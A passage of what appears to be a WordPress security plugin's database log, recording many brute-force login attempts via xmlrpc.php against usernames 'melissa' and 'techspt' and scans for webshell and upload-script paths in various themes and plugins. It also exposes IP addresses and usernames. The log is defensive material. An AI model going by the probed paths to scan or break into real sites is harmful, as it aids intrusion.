hp',0,701,0),('194.187.251.115',3267099507,'techspt',0,1680751023.4879,152,'TtYRBJdo0XeG7ZxhfMrqK8aA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.195.105.117',868444533,'melissa',0,1680752492.9271,152,'v6mjZedyKIuRLSEJwF7UBX9G','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.231.78.38',99044902,'melissa',0,1680752492.9355,152,'x21wXSUirIDMJL5d9VKGapcQ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1680752506.1934,152,'GrEmogUzS54dJDQqTVs3LcKP','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'melissa',0,1680752508.0734,152,'FJVRTsMoeUdtrzSLOZcPuW7l','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.69.27.72',2672106312,'melissa',0,1680752508.7935,152,'NZIznWs5Ru8LFqKl0wmtGe7U','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('81.181.130.56',1370849848,'melissa',0,1680752523.5474,152,'S42xYpa1kcbTH3DAQvzoKOnN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('95.216.1.11',1607991563,'melissa',0,1680752524.4982,152,'dI2SpEPQ9fx6ynaHO8l7cBwj','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'melissa',0,1680752533.5161,152,'TlDz7ohNe68M0udiFZ2LE9K5','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.22.249.133',85391749,'melissa',0,1680752537.2784,152,'ICQgdw0EB7hl1yYn3qAZiKa6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.241.137.45',3354495277,'melissa',0,1680752538.0483,152,'Dn9gE6sFPrch2fUWbvB841x5','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('182.50.151.63',3056768831,'melissa',0,1680752540.0747,152,'wP9gBSu1vZ5GIVsEFMpJTAhC','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'melissa',0,1680752544.9851,152,'28Tyvs4r1cYKHhpjCUZId0AN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'',0,1680752544.9882,10,'28Tyvs4r1cYKHhpjCUZId0AN','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('13.75.144.52',223055924,'melissa',0,1680753306.1488,152,'EV1ftlXhgy52r7nbJRBKi4qO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.52',2487806004,'melissa',0,1680753306.2726,152,'nZk9QmvBaDAyHT6Kd2pweq18','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1680753309.7840,152,'VN810qRPSoumpxQnltz25bje','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'',0,1680753309.7877,10,'VN810qRPSoumpxQnltz25bje','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('82.65.248.18',1380055058,'melissa',0,1680754425.8538,152,'jCUGuRdW1rZxX0kSLJ4wz3Ky','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.178.36.28',2947687452,'melissa',0,1680754428.7556,152,'FEDMzrP5RXJb80uivkSoG9Ap','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('190.60.234.18',3191663122,'melissa',0,1680754430.2165,152,'rsakCDbeFX61OuAPwz7Yd3E5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.152.79.248',1738035192,'melissa',0,1680754445.5023,152,'xMZzJEa8uLc0vBrlpkyQFRS2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.140.29.143',143400335,'melissa',0,1680754447.5883,152,'L7QcsSCITPbjotdRDK8N60EH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.187',1152553403,'melissa',0,1680754460.5542,152,'JwZFnG2lxsNtmdua1c8fMY76','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.211',2249438163,'techspt',0,1680755078.4833,152,'1agHmzfN60eUPRn8Y97FCbyv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.195',3091979715,'techspt',0,1680757611.5539,152,'UhpdVrfkGjJBXl3ZKzF5WTNP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('137.184.211.244',2310591476,'melissa',0,1680760154.7762,152,'MhZxbqwmV5cAXil30aSd7D2z','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'melissa',0,1680760160.2053,152,'BUVtxmuOWpT6XywNZlkGqaQ9','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.241.139.132',3354495876,'melissa',0,1680760167.9783,152,'W1YDOajdVI7HXi8Ggn4tclKr','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.178.145.169',1152553385,'melissa',0,1680760178.5720,152,'avw43gSEoKXDhJdA19WfGYiy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1680760180.4970,152,'Lsy2pYE83SQBaV7jfwdbW5iU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'melissa',0,1680760186.6183,152,'Ji4evq1L6CpusDYnz7FmwPVM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1680760189.6492,152,'0AP9nVbXi3WjxpJQaZSNzmF6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.38.151.68',2619774788,'melissa',0,1680760200.3224,152,'rGYdWx7ighSnkbmMTJVPoFCz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.114.164.226',3228738786,'melissa',0,1680760202.7024,152,'3jogJGmrtYELxisA12DWVdhC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('163.44.192.252',2737619196,'melissa',0,1680760280.5359,152,'ErBv5GFf7Tk0ZlLjOUJm1IHq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.179',2249438131,'techspt',0,1680761133.1357,152,'6foKdB2lnSCgZvINyh38W0F1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.212.218.52',2916407860,'',0,1680762128.2925,55,'7nIcm3LfQuvz9TedNpk2hjBM','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('173.212.218.52',2916407860,'',0,1680762129.4914,55,'92g5wavIi7bPSjYmQBe6tUsJ','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('173.212.218.52',2916407860,'',0,1680762129.4930,10,'92g5wavIi7bPSjYmQBe6tUsJ','','707|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,707,0),('142.93.86.83',2388481619,'melissa',0,1680762634.5513,152,'h90Fs7NC3LikO46cJfU5QTBH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.77.231.194',860743618,'melissa',0,1680762635.3856,152,'wIJnvfqUdi4x360WEGXjm8hz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.187.168.176',1740351664,'melissa',0,1680762640.0286,152,'LPw52M7bmDpsSyKdVkcRqvG3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.238.120',148041336,'melissa',0,1680762641.9246,152,'Gme09cF35B4zXtrqkJ6hYinb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.223.93.124',2682215804,'melissa',0,1680762652.9895,152,'n8YHrcAy1LWTFKwfepIiRxm9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1680762656.3737,152,'ryZVEJAWju5XsnQoRTBifL2S','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.115.25',3098047257,'melissa',0,1680762657.7483,152,'4aO08ypfGcPxTh9eubBW1SmJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.114.164.226',3228738786,'melissa',0,1680762668.7622,152,'dZca294kvo5JPjybBCH80VUh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.78.94.39',89021991,'',0,1680763516.1072,55,'8gUR3fqGDEyePKrN10OuAF7d','','19|0|0|0|cmdev-site1.com/wp-content/themes/statfort-new/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763517.6655,55,'xsITURqD0mtKF529Xnv6iHdj','','19|0|0|0|cmdev-site1.com/wp-content/themes/faith-theme/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763517.6692,10,'xsITURqD0mtKF529Xnv6iHdj','','707|0|0|0|cmdev-site1.com/wp-content/themes/faith-theme/include/lang_upload.php',0,707,0),('5.78.94.39',89021991,'',0,1680763518.8382,55,'krPWqIgaz6G8yQ5fhCLFlXYH','','19|0|0|0|cmdev-site1.com/wp-content/themes/soccer-theme/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763519.9671,55,'84JMYSeVgdnHEAWRZlXv5mhG','','19|0|0|0|cmdev-site1.com/wp-content/themes/churchlife/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763521.1677,55,'1TgtXxGkzifD5uoW2dMI7QFv','','19|0|0|0|cmdev-site1.com/wp-content/themes/onelife/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763523.6414,55,'k0pIYSsh1Ae3yBiKD795vjbX','','19|0|0|0|cmdev-site1.com/wp-content/themes/snapture/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763525.0035,55,'dlMX0sh63AEvr5ZRPtBykzpq','','19|0|0|0|cmdev-site1.com/wp-content/themes/theme-deejay/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763526.2732,55,'mzr0tkuX7NDOgIY3nAi8vCls','','19|0|0|0|cmdev-site1.com/wp-content/themes/bolster-theme/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763527.6121,55,'4VFro8csOWn2XZeKkYIdv0qz','','19|0|0|0|cmdev-site1.com/wp-content/themes/rocky-theme/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763528.9667,55,'jLxQyMqRhdWe7VDgUXkt3G8w','','19|0|0|0|cmdev-site1.com/wp-content/themes/bolster/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763530.1340,55,'lwqap1I2UgZ0bz9hvt8xdQ4C','','19|0|0|0|cmdev-site1.com/wp-content/themes/soundblast/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763531.2828,55,'LUhFGrXQP2ilRkKtezxTq8AB','','19|0|0|0|cmdev-site1.com/wp-content/themes/spikes-black/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763532.4336,55,'eYJrF8A3gvcqap7lBkOsN5ZV','','19|0|0|0|cmdev-site1.com/wp-content/themes/spikes/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763533.5631,55,'Hykpm7s3N9YK5AT0XrjvuWod','','19|0|0|0|cmdev-site1.com/wp-content/themes/kingclub-theme/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763534.7195,55,'SbDvECHXVrf0B3561xhyGPld','','19|0|0|0|cmdev-site1.com/wp-content/themes/club-theme/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763535.8627,55,'xqILiB0U2vrmjf6wDEP9ATQ7','','19|0|0|0|cmdev-site1.com/wp-content/themes/statfort/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763537.1237,55,'S9cXwjJhmZb5xIGVuMNBegTk','','19|0|0|0|cmdev-site1.com/wp-content/themes/aidreform/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763538.3583,55,'S69LbDvPAW8iQXMBqUV2rgjO','','19|0|0|0|cmdev-site1.com/wp-content/themes/footysquare/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763540.6933,55,'E7gOnbN09XMUrZBjHQ8DulCY','','19|0|0|0|cmdev-site1.com/wp-content/themes/westand/include/lang_upload.php',0,19,0),('5.78.94.39',89021991,'',0,1680763542.1621,55,'Zc0OFLEzMH9sbSIJR2vaGXQg','','19|0|0|0|cmdev-site1.com/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php',0,19,0),('154.221.18.150',2598179478,'melissa',0,1680764524.5051,152,'FNuVthbyr2xdaCvXokIm5SzJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('68.183.144.184',1152880824,'melissa',0,1680764526.2753,152,'sVBuGP5F0a3JOmSv1bCoWTL6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.198.27.128',3116768128,'melissa',0,1680764533.9347,152,'py1vjVJeEQzG7RfiIL0MaZ6W','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.38.242.51',908522035,'melissa',0,1680764540.8626,152,'BeAYbgS7lzDQIPa3WjUm5Miw','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('86.48.23.13',1445992205,'melissa',0,1680764551.4315,152,'1qLm9BZdyn5EV7CSi6epWHGz','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('144.24.100.136',2417517704,'melissa',0,1680764552.3404,152,'el91bndJLtYCK4saHTvFIfOj','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.206.201.230',1540278758,'melissa',0,1680764560.0240,152,'MyFvIigYJzQAGXfSNTDhqU6p','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('134.19.179.147',2249438099,'techspt',0,1680764954.2733,152,'560BEzyhpS7NUqMuGA4n91Jg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('195.206.105.227',3285084643,'techspt',0,1680767076.9250,152,'xSs4zhZktBTw0rq9aOyfjDdv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('195.206.105.203',3285084619,'techspt',0,1680767581.4841,152,'wJZ1SqNAFyn5cHEdVx8zgtQL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.203',3091979723,'techspt',0,1680768253.1346,152,'uinUxOmKYTkICbN9BQwDMWfe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.203',3091979723,'techspt',0,1680768389.6522,152,'fz8Uil4h19kWa2qbO3pDVrJS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.203',3091979723,'',0,1680768389.6652,10,'fz8Uil4h19kWa2qbO3pDVrJS','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('184.168.98.254',3098043134,'melissa',0,1680769025.3133,152,'Dt0g17SNvZT82r9kqGduImab','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.130.219.197',1736629189,'melissa',0,1680769029.7643,152,'Lj0GgPnV3reTNsFB96um1XMt','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1680769032.4634,152,'efqCVydM5YcQmp6DaUJ2wrBO','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('65.21.239.153',1091956633,'melissa',0,1680769034.8463,152,'oeOwmJlSFEc0uPz69g1D3YGX','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'melissa',0,1680769041.7821,152,'g5vFtHbzrRqsGVPUYmdN6Q1n','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.38.88.243',3324401907,'melissa',0,1680769045.8599,152,'mvEncuzjOeZt6Iy1GhV8NpX7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('114.215.93.65',1926716737,'melissa',0,1680769056.3636,152,'Vr3k8LnIdvpi1e6U0GRoFAgZ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('173.212.199.147',2916403091,'melissa',0,1680769061.5642,152,'JrZBAclnzegGq6KXPDEv92Fs','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.231.174.129',585608833,'melissa',0,1680769062.3737,152,'8LAutzQk7c1nowBNxiSC3GpW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('74.208.160.149',1255186581,'melissa',0,1680769064.6126,152,'bFS9rjixfpAGPM3kQDzN2XWE','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.17.155',1556943259,'melissa',0,1680769087.5078,152,'KzyiS84LIPdYo0ZH3wf5nXCO','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('184.75.223.195',3091980227,'techspt',0,1680769284.2144,152,'3hdL2HCzG9NkPFIAqK1ZJDxX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.185.89.10',3115931914,'melissa',0,1680769594.8910,152,'M2oFQcVi8fyOx5slrgURzDm3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.75.194.213',860603093,'melissa',0,1680769600.7273,152,'WanwsN2cqYdgxlt4oZ8jDrpm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1680769612.5013,152,'bnZfx9YM7KDOWCjwE5H0ITPe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('188.128.149.108',3162543468,'melissa',0,1680769613.3393,152,'vgVBnrW1tDoYxdm9RzE8lHJq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.214.170.82',2916526674,'melissa',0,1680769616.2744,152,'thYOwFpMEyWS6HZzbJBk2f5c','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.214.170.82',2916526674,'melissa',0,1680769619.0572,152,'8viMbIyBRmGjpXnVU9qS4Jct','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.214.170.82',2916526674,'',0,1680769619.0610,10,'8viMbIyBRmGjpXnVU9qS4Jct','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('45.195.25.73',767760713,'melissa',0,1680769624.5003,152,'6ryDavheCs5b3d0w4GWJjLn1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('35.195.46.200',599994056,'melissa',0,1680769628.4352,152,'e6UYgRyK5jmA4ibS2IWZJtzG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('62.102.148.189',1046910141,'techspt',0,1680772939.0990,152,'QlWndgzLGNrAfOYSUToE1sZ7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1680773078.8469,152,'b4wDfOR2e7lAZoGt0xzaI6Km','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.205.178.151',1137554071,'melissa',0,1680773080.2864,152,'LPHuaehQNpwEqZ1yTilrnsUM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.216.214.24',3117995544,'melissa',0,1680773080.3478,152,'Jsy8fKYHQEmNX5WBhGrd2FVM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('142.93.223.16',2388516624,'melissa',0,1680773093.0570,152,'smGgVlfocYBKpkZrQ61CwvI5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.205.178.151',1137554071,'melissa',0,1680773093.8258,152,'QbmJFxZa2huwH6eMgjyDLcGB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.205.178.151',1137554071,'',0,1680773093.8293,10,'QbmJFxZa2huwH6eMgjyDLcGB','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('178.210.67.162',3000124322,'melissa',0,1680773108.9372,152,'MIEjoKgzcS8p2dGqHNtrR70Z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1680773113.4050,152,'2KOVjRQuL8hlA9gdikSXyGaW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('139.99.61.204',2338536908,'melissa',0,1680773118.6794,152,'U92acZMxk1hTqBFKdwJgj5PS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('72.167.69.17',1218921745,'melissa',0,1680773125.7248,152,'ncIFmKAMg1bVqCwhOjS3kDUl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.190',1152553406,'melissa',0,1680773129.2928,152,'jL32YftnowP70NiKqdDbXuSr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.102.28.107',1382423659,'techspt',0,1680774132.8089,152,'gvxsA0dLpl3No49C5qySWOeu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('217.138.195.27',3649749787,'techspt',0,1680774802.7495,152,'tashDAUmMO9nWRlJQL87c3iS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.171',3091979691,'techspt',0,1680776838.0247,152,'qNSebIFdrUPh9lwcR7KmDnTy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.215.82.71',1758941767,'melissa',0,1680777761.2602,152,'w3L7VyqNOPt1f8X9vUFJGjuZ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.3.1.158',1728250270,'melissa',0,1680777761.6804,152,'cBAW2ME4uVh0psmktJ73jFrn','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('210.116.66.47',3530834479,'melissa',0,1680777762.4470,152,'1HDZs6PnTbRILtGlu4K2vUXN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('188.225.23.115',3168868211,'melissa',0,1680777771.3926,152,'UdZTv5nbpVcDK7yOxHYifmrR','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.38.197.19',908510483,'melissa',0,1680777778.9990,152,'QCADlaFsn8621BVtheRbJcIw','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1680777787.1462,152,'QFgSPEdWy0Zh3qK1Bb8xfnz2','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1680777794.4852,152,'IeM1fT75BNYzSyDl6xULbkpJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'',3,1680778133.0062,6,'Z1ow4a8DvcgeFAMdVTlXSq60','','530|0|0|0|cmdev-site1.com/the-wild-hunt/',0,530,3),('13.75.144.52',223055924,'melissa',0,1680779750.7433,152,'kwDxVJ7avKU06Be5LAmgruqd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.92.235.82',1734142802,'melissa',0,1680779761.0606,152,'qYATZbye7Ej2KkCH46vigO0P','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.169',1152553385,'melissa',0,1680779761.3465,152,'PDi7xQSkwXVpTbYU0aG1Rr4d','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('163.172.60.103',2745973863,'melissa',0,1680779761.4634,152,'MdKlHaIh6oN4tVDCpL91m72y','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.96.211',3098042579,'melissa',0,1680779770.3833,152,'acbfHFZRQkrG4SJNIulCzBdL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'melissa',0,1680779779.2933,152,'Uzk8uKCOhW7SRjcJV4PpHFI0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.224.21.75',2631931211,'melissa',0,1680779783.1106,152,'qAYOIxSfNXiZaWz7ldvUkDc3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1680779785.7928,152,'GSd58iegrAXVkRpTyLqFfw09','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'',0,1680779785.7967,10,'GSd58iegrAXVkRpTyLqFfw09','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('92.42.111.218',1546285018,'melissa',0,1680779791.0280,152,'s1Cl6Ww5BL9SFV0NH3xfMJ7Z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.223.93.124',2682215804,'melissa',0,1680779792.0972,152,'r9Xpz6w1PDAcLjMROGK7bFI2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.189.13.115',1807551859,'melissa',0,1680783290.2796,152,'z0eCXmJynN7fTiDG4Rq1hwEc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('140.174.6.37',2360215077,'melissa',0,1680783290.9580,152,'FXCMTb8ykNGj32evhw1sigRJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'melissa',0,1680783299.1067,152,'z6q2JtIWQHy3c1uAjS85Frlk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.0.217.70',2717964614,'melissa',0,1680783301.3098,152,'A5fFqw3LzQVBtl4ET2kdbivO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('175.178.36.28',2947687452,'melissa',0,1680783308.1005,152,'FhPeZRMiXDIzSpL1sOGlx0gC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.204.55.166',1556887462,'melissa',0,1680783311.4883,152,'15tKnSDxBNRiekM9b6sFX2lf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.152.248.16',1738078224,'melissa',0,1680783315.5430,152,'onQZbKfhNy0OcMr71Ajdl8kL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.223.93.124',2682215804,'melissa',0,1680783336.0597,152,'IAstfleUZQvwzO3HpG9LckJD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('81.208.11.40',1372588840,'melissa',0,1680783338.6150,152,'pIdU8Sa6fve0YBPQJHCOFiA7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'Melissa',3,1680784816.7407,5,'U8c7bjIygasYS4Dr0TpfxH6i','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('184.75.223.195',3091980227,'techspt',0,1680786552.3672,152,'s1MEzhRLaJrAeOZtxiIl4Cjw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('31.170.22.49',531240497,'melissa',0,1680789089.7166,152,'LwtW1mYVDuajNHlkhfBgzK6b','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1680789092.2898,152,'OZeYNgnjDRvKp6xU32FJfXmC','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.17.155',1556943259,'melissa',0,1680789093.2099,152,'XlHeIZhtDb7mL01kiVFRTBAG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.219.122.50',1541110322,'melissa',0,1680789100.9336,152,'XMvDSd3lViLnracTwe6FHWR1','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.59.206.66',3258699330,'melissa',0,1680789103.9640,152,'RInvbU7k0XzhKAdxaZqTGsBg','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('101.50.2.67',1697776195,'melissa',0,1680789106.2339,152,'QkoiJW3acrKUjZtFs91BSyl7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('182.92.129.110',3059515758,'melissa',0,1680789115.3650,152,'CydtbJNLlv7F3qunkMzRaW04','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.38.242.51',908522035,'melissa',0,1680789115.9685,152,'ANGO8kaHZTr7SmiQDn2tUp3F','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.204.46.91',1540107867,'melissa',0,1680789116.4351,152,'pOMCXA6PYm94wicUgorbR1Wa','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.152.186.40',3583556136,'techspt',0,1680792375.7329,152,'Ib4ktvplZxVEz6Kiu0C7LG9q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1680792455.4552,152,'dHiIMycR6YaDZutrjs4AgqX5','','0|0|0|0|cmdev-site1.com/xm